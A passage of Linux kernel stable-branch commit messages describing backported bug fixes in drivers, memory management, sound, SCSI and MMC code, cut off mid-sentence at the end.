Signed-off-by: Lorenzo Bianconi <lorenzo.bianconi@st.com>
Fixes: 1e52fefc9b ("iio: accel: Add support for the h3lis331dl accelerometer")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8af644a7d6 upstream.
This fix makes newer ISH hubs work. Previous ones worked by lucky
coincidence.
Rotation sensor function does not work due to miss PM function.
Add common hid sensor iio pm function for rotation sensor.
Further clarification from Srinivas:
If CONFIG_PM is not defined, then this prevents this sensor to
function. So above commit caused this.
This sensor was supposed to be always on to trigger wake up in prior
external hubs. But with the new ISH hub this is not the case.
Signed-off-by: Song Hongyan <hongyan.song@intel.com>
Fixes: 2b89635e9a ("iio: hid_sensor_hub: Common PM functions")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6f77199e9e upstream.
While testing, it was observed that on some platforms the scale value
from iio sysfs for gyroscope is always 0 (E.g. Yoga 260). This results
in the final angular velocity component values to be zeros.
This is caused by insufficient precision of scale value displayed in sysfs.
If the precision is changed to nano from current micro, then this is
sufficient to display the scale value on this platform.
Since this can be a problem for all other HID sensors, increase scale
precision of all HID sensors to nano from current micro.
Results on Yoga 260:
name scale before scale now
--------------------------------------------
gyro_3d 0.000000 0.000000174
als 0.001000 0.001000000
magn_3d 0.000001 0.000001000
accel_3d 0.000009 0.000009806
Signed-off-by: Song Hongyan <hongyan.song@intel.com>
Acked-by: Srinivas Pandruvada <srinivas.pandruvada@linux.intel.com>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7309aa847e upstream.
variable struct usb_cdc_parsed_header h may be used
uninitialized in acm_probe.
In kernel 4.8.
/* handle quirks deadly to normal probing*/
if (quirks == NO_UNION_NORMAL)
...
goto skip_normal_probe;
}
we bypass call to
cdc_parse_cdc_header(&h, intf, buffer, buflen);
but later use h in
if (h.usb_cdc_country_functional_desc) { /* export the country data */
Signed-off-by: Oliver Neukum <oneukum@suse.com>
Reported-by: Victor Sologoubov <victor0@rambler.ru>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7c1c5413a7 upstream.
The boot-time frequency of a CPU is considered its rated maximum, as we
have no other source of such information. However, this was previously
only used for chips with 80% restrictions on secondary PLLs. This
usually wasn't a problem because most chips/configs boot with a divider
of /1, with other dividers being used only for dynamic frequency
reduction. However, at least one config (LS1021A at less than 1 GHz)
uses a different divider for top speed. This was causing cpufreq to set
a frequency beyond the chip's rated speed.
This is fixed by applying a 100%-of-initial-speed limit to all CPU PLLs,
similar to the existing 80% limit that only applied to some.
Signed-off-by: Scott Wood <oss@buserror.net>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1c80e9603f upstream.
Bug 150611 uncovered that the WMI ID used by the toshiba-wmi driver
is not Toshiba specific, and as such, the driver was being loaded
on non Toshiba laptops too.
This patch adds a DMI matching list checking for TOSHIBA as the
vendor, refusing to load if it is not.
Also the WMI GUID was renamed, dropping the TOSHIBA_ prefix, to
better reflect that such GUID is not a Toshiba specific one.
Signed-off-by: Azael Avalos <coproscefalo@gmail.com>
Signed-off-by: Darren Hart <dvhart@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d8e9e5e80e upstream.
Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.
DRBD as external module has been around in the kernel 2.4 days already.
We used to be compatible to 2.4 and very early 2.6 kernels,
we used to use
rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
tcp_sendmsg() used to totally ignore the size parameter.
57be5bd ip: convert tcp_sendmsg() to iov_iter primitives
changes that, and exposes our long standing error.
Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time". Apparently that was unlikely enough for most, so this went
unnoticed for years.
Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=2336150
[4] http://e2.howsolveproblem.com/i/1175162/
This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.
It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).
It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().
Fixes: b411b3637f ("The DRBD driver")
Cc: viro@zeniv.linux.org.uk
Cc: christoph.lechleitner@iteg.at
Cc: wolfgang.glas@iteg.at
Reported-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Tested-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Signed-off-by: Richard Weinberger <richard@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <lars.ellenberg@linbit.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fd9afd3cbe upstream.
According to Dave Miller "the networking stack has a
hard requirement that all SKBs which are transmitted
must have their completion signalled in a fininte
amount of time. This is because, until the SKB is
freed by the driver, it holds onto socket,
netfilter, and other subsystem resources."
In summary, this means that using TX IRQ throttling
for the networking gadgets is, at least, complex and
we should avoid it for the time being.
Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Tested-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Suggested-by: David Miller <davem@davemloft.net>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 18266403f3 upstream.
The TIOCMIWAIT implementation would return -EINVAL if any of the three
supported signals were included in the mask.
Instead of returning an error in case TIOCM_CTS is included, simply
drop the mask check completely, which is in accordance with how other
drivers implement this ioctl.
Fixes: 5a6a62bdb9 ("cdc-acm: add TIOCMIWAIT")
Signed-off-by: Johan Hovold <johan@kernel.org>
Acked-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 68fae2f3df upstream.
This basicly reverts commit e534f3e9 (staging:nvec: Introduce the use of
the managed version of kzalloc). Serio struct should never by managed
because it is refcounted. Doing so will lead to a double free oops on module
remove.
Signed-off-by: Marc Dietrich <marvin24@gmx.de>
Fixes: e534f3e942 ("staging:nvec: Introduce the use of the managed version of kzalloc")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 17c1c9ba15 upstream.
This reverts commit 36b30d6138.
This is necessary to detect paz00 (ac100) touchpad properly as one
speaking ETPS/2 protocol. Without it X.org's synaptics driver doesn't
work as the touchpad is detected as an ImPS/2 mouse instead.
Commit ec6184b1c7 changed the way
auto-detection is performed on ports marked as pass through and made the
issue apparent.
A pass through port is an additional PS/2 port used to connect a slave
device to a master device that is using PS/2 to communicate with the
host (so slave's PS/2 communication is tunneled over master's PS/2
link). "Synaptics PS/2 TouchPad Interfacing Guide" describes such a
setup (PS/2 PASS-THROUGH OPTION section).
Since paz00's embedded controller is not connected to a PS/2 port
itself, the PS/2 interface it exposes is not a pass-through one.
Signed-off-by: Paul Fertser <fercerpav@gmail.com>
Acked-by: Marc Dietrich <marvin24@gmx.de>
Fixes: 36b30d6138 ("staging: nvec: ps2: change serio type to passthrough")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d8f8a74d5f upstream.
This command was sent behind serio's back and the answer to it was
confusing atkbd probe function which lead to the elantech touchpad
getting detected as a keyboard.
To prevent this from happening just let every party do its part of the
job.
Signed-off-by: Paul Fertser <fercerpav@gmail.com>
Acked-by: Marc Dietrich <marvin24@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 55abe8165f upstream.
`ni_tio_clock_period_ps()` used to return the clock period in
picoseconds, and had a `BUG()` call for invalid cases. It was changed
to pass the clock period back via a pointer parameter and return an
error for the invalid cases. Unfortunately the code to handle
user-specified clock sources with user-specified clock period is still
returning the clock period the old way, which can lead to the caller not
getting the clock period, or seeing an unexpected error. Fix it by
passing the clock period via the pointer parameter and returning `0`.
Fixes: b42ca86ad6 ("staging: comedi: ni_tio: remove BUG() checks for ni_tio_get_clock_src()")
Signed-off-by: Ian Abbott <abbotti@mev.co.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 33c027ae3c upstream.
Early commit 30ca5cb63c ("staging: sm750fb: change definition of
PANEL_PLANE_TL fields") and 27b047bbe1 ("staging: sm750fb: change
definition of PANEL_PLANE_BR fields") modify the register bit fields
definitions. But the modifications are wrong, because the bit mask of
"bit field 10:0" is not 0xeff, but 0x7ff. The wrong definition bugs
makes display very strange.
Signed-off-by: Huacai Chen <chenhc@lemote.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 34eee70a7b upstream.
The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:
drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]
This adds minimal error handling so we only evaluate the
data if it was correctly read.
Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fe1b5700c7 upstream.
In the eMMC 4.51 version of the spec, an EXT_CSD field called
GENERIC_CMD6_TIME[248] was added. This allows cards to specify the maximum
time it may need to move out from its busy state, when a CMD6 command has
been sent.
In cases when the card is compliant to versions < 4.51 of the eMMC spec,
obviously the core needs to use a fall-back value for this timeout, which
currently is set to 10 minutes. This value is completely in the wrong range
and importantly in some cases it causes a card initialization to take more
than 10 minute to complete.
Earlier this scenario was avoided as the mmc core used CMD13 to poll the
card, to find out when it stopped signaling busy. Commit 08573eaf1a
("mmc: mmc: do not use CMD13 to get status after speed mode switch")
changed this behavior.
Instead of reverting that commit, which would cause other issues, let's
instead start by picking a simple solution for the problem, by using a
500ms default generic CMD6 timeout.
The reason for using exactly 500ms, comes from observations that shows it's
quite common for cards to specify 250ms. 500ms is two times that value so
likely it should be enough for most cards.
Fixes: 08573eaf1a ("mmc: mmc: do not use CMD13 to get status after speed
mode switch")
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Tested-by: Stephen Boyd <sboyd@codeaurora.org>
Tested-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 69b962a65a upstream.
In the busy response case (i.e. !host->data), an unexpected data interrupt
would result in clearing the data command as though it had completed but
without informing the upper layers and thus resulting in a hang. Fix by
only clearing the data command for data interrupts that are expected.
Signed-off-by: Adrian Hunter <adrian.hunter@intel.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6ebebeab51 upstream.
CMD line reset during an ongoing data transfer can cause the data transfer
to hang. Fix by delaying the reset until the data transfer is finished.
Signed-off-by: Adrian Hunter <adrian.hunter@intel.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c25badc9ce upstream.
When converting to a shared library in ac5a181d06 ("cpupower: Add
cpuidle parts into library"), cpu_freq_cpu_exists() was converted to
cpupower_is_cpu_online(). cpu_req_cpu_exists() returned 0 on success and
-ENOSYS on failure whereas cpupower_is_cpu_online returns 1 on success.
Check for the correct return value in cpufreq-set.
Link: https://bugzilla.redhat.com/show_bug.cgi?id=1374212
Fixes: ac5a181d06 (cpupower: Add cpuidle parts into library)
Reported-by: Julian Seward <jseward@acm.org>
Signed-off-by: Laura Abbott <labbott@redhat.com>
Acked-by: Thomas Renninger <trenn@suse.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d2cdf5dc58 upstream.
When the system is suspended to S3 the BIOS might re-initialize certain
GPIO pins back to their original state or it may re-program interrupt mask
of others. For example Acer TravelMate B116-M had BIOS bug where certain
GPIO pin (MF_ISH_GPIO_5) was programmed to trigger on high level, and the
pin state was high once the BIOS gave control to the OS on resume.
This triggers lots of messages like:
irq 117, desc: ffff88017a61e600, depth: 1, count: 0, unhandled: 0
->handle_irq(): ffffffff8109b613, handle_bad_irq+0x0/0x1e0
->irq_data.chip(): ffffffffa0020180, chv_pinctrl_exit+0x2d84/0x12 [pinctrl_cherryview]
->action(): (null)
IRQ_NOPROBE set
We reset the mask back to known state in chv_pinctrl_resume() but that is
called only after device interrupts have already been enabled.
Now, this particular issue was fixed by upgrading the BIOS to the latest
(v1.23) but not everybody upgrades their BIOSes so we fix it up in the
driver as well.
Prevent the possible interrupt storm by moving suspend and resume hooks to
be called at _noirq time instead. Since device interrupts are still
disabled we can restore the mask back to known state before interrupt storm
happens.
Reported-by: Christian Steiner <christian.steiner@outlook.de>
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 56211121c0 upstream.
If async suspend is enabled, the driver may access registers concurrently
with another instance which may fail because of the bug in Cherryview GPIO
hardware. Prevent this by taking the shared lock while accessing the
hardware in suspend and resume hooks.
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a79a812131 upstream.
We used to use generic implementation of dma_map_ops.mmap which is
dma_common_mmap() but that only worked for simpler cached mappings when
vaddr = paddr.
If a driver requests uncached DMA buffer kernel maps it to virtual
address so that MMU gets involved and page uncached status takes into
account. In that case usage of dma_common_mmap() lead to mapping of
vaddr to vaddr for user-space which is obviously wrong. For more detals
please refer to verbose explanation here [1].
So here we implement our own version of mmap() which always deals
with dma_addr and maps underlying memory to user-space properly
(note that DMA buffer mapped to user-space is always uncached
because there's no way to properly manage cache from user-space).
[1] https://lkml.org/lkml/2016/10/26/973
Reviewed-by: Catalin Marinas <catalin.marinas@arm.com>
Cc: Marek Szyprowski <m.szyprowski@samsung.com>
Signed-off-by: Alexey Brodkin <abrodkin@synopsys.com>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 16d917b130 upstream.
If we're using a shadow copy of a PCI device ROM, the shadow copy is in RAM
and the device never sees accesses to it and doesn't respond to it. We
don't have to route the shadow range to the PCI device, and the device
doesn't have to claim the range.
Previously we treated the shadow copy as though it were the ROM BAR, and we
failed to claim it because the region wasn't routed to the device:
pci 0000:01:00.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]
pci_bus 0000:01: Allocating resources
pci 0000:01:00.0: can't claim BAR 6 [mem 0x000c0000-0x000dffff]: no compatible bridge window
The failure path of pcibios_allocate_dev_rom_resource() cleared out the
resource start address, which also caused the following ioremap() warning:
WARNING: CPU: 0 PID: 116 at /build/linux-akdJXO/linux-4.8.0/arch/x86/mm/ioremap.c:121 __ioremap_caller+0x1ec/0x370
ioremap on RAM at 0x0000000000000000 - 0x000000000001ffff
Handle an option ROM shadow copy as RAM, without trying to insert it into
the iomem resource tree.
This fixes a regression caused by 0c0e0736ac ("PCI: Set ROM shadow
location in arch code, not in PCI core"), which appeared in v4.6. The
regression causes video device initialization to fail. This was reported
on AMD Turks, but it likely affects others as well.
Fixes: 0c0e0736ac ("PCI: Set ROM shadow location in arch code, not in PCI core")
Reported-and-tested-by: Vecu Bosseur <vecu.bosseur@gmail.com>
Link: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1627496
Link: https://bugzilla.kernel.org/show_bug.cgi?id=175391
Link: https://bugzilla.redhat.com/show_bug.cgi?id=1352272
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 922cc17199 upstream.
The current code doesn't even compile as somehow the inline assembly
can't see the register names defined as ARC_RTC_*
I'm pretty sure It worked when I first got it merged, but the tools were
definitely different then.
So better to write this in "C" anyways.
Acked-by: Daniel Lezcano <daniel.lezcano@linaro.org>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 237d6e6884 upstream.
Since commit d86bd1bece ("mm/slub: support left redzone") it is no longer
guaranteed that kmalloc(PAGE_SIZE) returns page aligned memory.
After the above commit we get an error for diag224 because aligned
memory is required. This leads to the following user visible error:
# mount none -t s390_hypfs /sys/hypervisor/
mount: unknown filesystem type 's390_hypfs'
# dmesg | grep hypfs
hypfs.cccfb8: The hardware system does not provide all functions
required by hypfs
hypfs.7a79f0: Initialization of hypfs failed with rc=-61
Fix this problem and use get_free_page() instead of kmalloc() to get
correctly aligned memory.
Signed-off-by: Michael Holzheu <holzheu@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 70d78fe7c8 upstream.
It could be not possible to freeze coredumping task when it waits for
'core_state->startup' completion, because threads are frozen in
get_signal() before they got a chance to complete 'core_state->startup'.
Inability to freeze a task during suspend will cause suspend to fail.
Also CRIU uses cgroup freezer during dump operation. So with an
unfreezable task the CRIU dump will fail because it waits for a
transition from 'FREEZING' to 'FROZEN' state which will never happen.
Use freezer_do_not_count() to tell freezer to ignore coredumping task
while it waits for core_state->startup completion.
Link: http://lkml.kernel.org/r/1475225434-3753-1-git-send-email-aryabinin@virtuozzo.com
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Acked-by: Pavel Machek <pavel@ucw.cz>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Alexander Viro <viro@zeniv.linux.org.uk>
Cc: Tejun Heo <tj@kernel.org>
Cc: "Rafael J. Wysocki" <rjw@rjwysocki.net>
Cc: Michal Hocko <mhocko@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 96b96a96dd upstream.
Error paths in hugetlb_cow() and hugetlb_no_page() may free a newly
allocated huge page.
If a reservation was associated with the huge page, alloc_huge_page()
consumed the reservation while allocating. When the newly allocated
page is freed in free_huge_page(), it will increment the global
reservation count. However, the reservation entry in the reserve map
will remain.
This is not an issue for shared mappings as the entry in the reserve map
indicates a reservation exists. But, an entry in a private mapping
reserve map indicates the reservation was consumed and no longer exists.
This results in an inconsistency between the reserve map and the global
reservation count. This 'leaks' a reserved huge page.
Create a new routine restore_reserve_on_error() to restore the reserve
entry in these specific error paths. This routine makes use of a new
function vma_add_reservation() which will add a reserve entry for a
specific address/page.
In general, these error paths were rarely (if ever) taken on most
architectures. However, powerpc contained arch specific code that that
resulted in an extra fault and execution of these error paths on all
private mappings.
Fixes: 67961f9db8 ("mm/hugetlb: fix huge page reserve accounting for private mappings)
Link: http://lkml.kernel.org/r/1476933077-23091-2-git-send-email-mike.kravetz@oracle.com
Signed-off-by: Mike Kravetz <mike.kravetz@oracle.com>
Reported-by: Jan Stancek <jstancek@redhat.com>
Tested-by: Jan Stancek <jstancek@redhat.com>
Reviewed-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Acked-by: Hillf Danton <hillf.zj@alibaba-inc.com>
Cc: Naoya Horiguchi <n-horiguchi@ah.jp.nec.com>
Cc: Michal Hocko <mhocko@suse.com>
Cc: Kirill A . Shutemov <kirill.shutemov@linux.intel.com>
Cc: Dave Hansen <dave.hansen@linux.intel.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c3901e722b upstream.
When memory_failure() runs on a thp tail page after pmd is split, we
trigger the following VM_BUG_ON_PAGE():
page:ffffd7cd819b0040 count:0 mapcount:0 mapping: (null) index:0x1
flags: 0x1fffc000400000(hwpoison)
page dumped because: VM_BUG_ON_PAGE(!page_count(p))
------------[ cut here ]------------
kernel BUG at /src/linux-dev/mm/memory-failure.c:1132!
memory_failure() passed refcount and page lock from tail page to head
page, which is not needed because we can pass any subpage to
split_huge_page().
Fixes: 61f5d698cc ("mm: re-enable THP")
Link: http://lkml.kernel.org/r/1477961577-7183-1-git-send-email-n-horiguchi@ah.jp.nec.com
Signed-off-by: Naoya Horiguchi <n-horiguchi@ah.jp.nec.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9956edf37e upstream.
If shmem_alloc_page() does not set PageLocked and PageSwapBacked, then
shmem_replace_page() needs to do so for itself. Without this, it puts
newpage on the wrong lru, re-unlocks the unlocked newpage, and system
descends into "Bad page" reports and freeze; or if CONFIG_DEBUG_VM=y, it
hits an earlier VM_BUG_ON_PAGE(!PageLocked), depending on config.
But shmem_replace_page() is not a common path: it's only called when
swapin (or swapoff) finds the page was already read into an unsuitable
zone: usually all zones are suitable, but gem objects for a few drm
devices (gma500, omapdrm, crestline, broadwater) require zone DMA32 if
there's more than 4GB of ram.
Fixes: 800d8c63b2 ("shmem: add huge pages support")
Link: http://lkml.kernel.org/r/alpine.LSU.2.11.1611062003510.11253@eggly.anvils
Signed-off-by: Hugh Dickins <hughd@google.com>
Acked-by: Kirill A. Shutemov <kirill.shutemov@linux.intel.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e322beefc upstream.
Christian Borntraeger reports:
With commit 8ea1d2a198 ("mm, frontswap: convert frontswap_enabled to
static key") kmemleak complains about a memory leak in swapon
unreferenced object 0x3e09ba56000 (size 32112640):
comm "swapon", pid 7852, jiffies 4294968787 (age 1490.770s)
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace:
__vmalloc_node_range+0x194/0x2d8
vzalloc+0x58/0x68
SyS_swapon+0xd60/0x12f8
system_call+0xd6/0x270
Turns out kmemleak is right. We now allocate the frontswap map
depending on the kernel config (and no longer on the enablement)
swapfile.c:
[...]
if (IS_ENABLED(CONFIG_FRONTSWAP))
frontswap_map = vzalloc(BITS_TO_LONGS(maxpages) * sizeof(long));
but later on this is passed along
--> enable_swap_info(p, prio, swap_map, cluster_info, frontswap_map);
and ignored if frontswap is disabled
--> frontswap_init(p->type, frontswap_map);
static inline void frontswap_init(unsigned type, unsigned long *map)
{
if (frontswap_enabled())
__frontswap_init(type, map);
}
Thing is, that frontswap map is never freed.
The leakage is relatively not that bad, because swapon is an infrequent
and privileged operation. However, if the first frontswap backend is
registered after a swap type has been already enabled, it will WARN_ON
in frontswap_register_ops() and frontswap will not be available for the
swap type.
Fix this by making sure the map is assigned by frontswap_init() as long
as CONFIG_FRONTSWAP is enabled.
Fixes: 8ea1d2a198 ("mm, frontswap: convert frontswap_enabled to static key")
Link: http://lkml.kernel.org/r/20161026134220.2566-1-vbabka@suse.cz
Signed-off-by: Vlastimil Babka <vbabka@suse.cz>
Reported-by: Christian Borntraeger <borntraeger@de.ibm.com>
Cc: Konrad Rzeszutek Wilk <konrad.wilk@oracle.com>
Cc: Boris Ostrovsky <boris.ostrovsky@oracle.com>
Cc: David Vrabel <david.vrabel@citrix.com>
Cc: Juergen Gross <jgross@suse.com>
Cc: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ba13e98f2c upstream.
When receiving a nec repeat, ensure the correct scancode is repeated
rather than a random value from the stack. This removes the need for
the bogus uninitialized_var() and also fixes the warnings:
drivers/media/usb/dvb-usb/dib0700_core.c: In function ‘dib0700_rc_urb_completion’:
drivers/media/usb/dvb-usb/dib0700_core.c:679: warning: ‘protocol’ may be used uninitialized in this function
[sean addon: So after writing the patch and submitting it, I've bought the
hardware on ebay. Without this patch you get random scancodes
on nec repeats, which the patch indeed fixes.]
Signed-off-by: Sean Young <sean@mess.org>
Tested-by: Sean Young <sean@mess.org>
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit aa5f920993 upstream.
Mismatching stream names in DAPM route and widget definitions are
causing compilation errors. Fixing these names allows the cs4270
driver to compile and function.
[Errors must be at probe time not compile time -- broonie]
Signed-off-by: Murray Foster <mrafoster@gmail.com>
Acked-by: Paul Handrigan <Paul.Handrigan@cirrus.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 027a9fe683 upstream.
The ALSA proc handler allows currently the write in the unlimited size
until kmalloc() fails. But basically the write is supposed to be only
for small inputs, mostly for one line inputs, and we don't have to
handle too large sizes at all. Since the kmalloc error results in the
kernel warning, it's better to limit the size beforehand.
This patch adds the limit of 16kB, which must be large enough for the
currently existing code.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6809cd682b upstream.
Currently the ALSA proc handler allows read or write even if the proc
file were write-only or read-only. It's mostly harmless, does thing
but allocating memory and ignores the input/output. But it doesn't
tell user about the invalid use, and it's confusing and inconsistent
in comparison with other proc files.
This patch adds some sanity checks and let the proc handler returning
an -EIO error when the invalid read/write is performed.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e5ec1759d upstream.
This patch will fix regression caused by commit 1e793f6fc0 ("scsi:
megaraid_sas: Fix data integrity failure for JBOD (passthrough)
devices").
The problem was that the MEGASAS_IS_LOGICAL macro did not have braces
and as a result the driver ended up exposing a lot of non-existing SCSI
devices (all SCSI commands to channels 1,2,3 were returned as
SUCCESS-DID_OK by driver).
[mkp: clarified patch description]
Fixes: 1e793f6fc0
Reported-by: Jens Axboe <axboe@kernel.dk>
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Tested-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Tested-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1e793f6fc0 upstream.
Commit 02b01e010a ("megaraid_sas: return sync cache call with
success") modified the driver to successfully complete SYNCHRONIZE_CACHE
commands without passing them to the controller. Disk drive caches are
only explicitly managed by controller firmware when operating in RAID
mode. So this commit effectively disabled writeback cache flushing for
any drives used in JBOD mode, leading to data integrity failures.
[mkp: clarified patch description]
Fixes: 02b01e010a
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Reviewed-by: Ewan D. Milne <emilne@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a9c3ca5fae upstream.
Some requests could be accounted for multiple
times. Let's fix that so each and every requests is
accounted for only once.
Fixes: 55a0237f8f ("usb: dwc3: gadget: use allocated/queued reqs for LST bit")
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit f9d4286b95 ]
Commit 01cfbad "ipv4: Update parameters for csum_tcpudp_magic to their
original types" changed parameters for csum_tcpudp_magic and
csum_tcpudp_nofold for many platforms but not for PowerPC.
Fixes: 01cfbad "ipv4: Update parameters for csum_tcpudp_magic to their original types"
Cc: Alexander Duyck <aduyck@mirantis.com>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
Acked-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 104ba78c98 ]
When transmitting on a packet socket with PACKET_VNET_HDR and
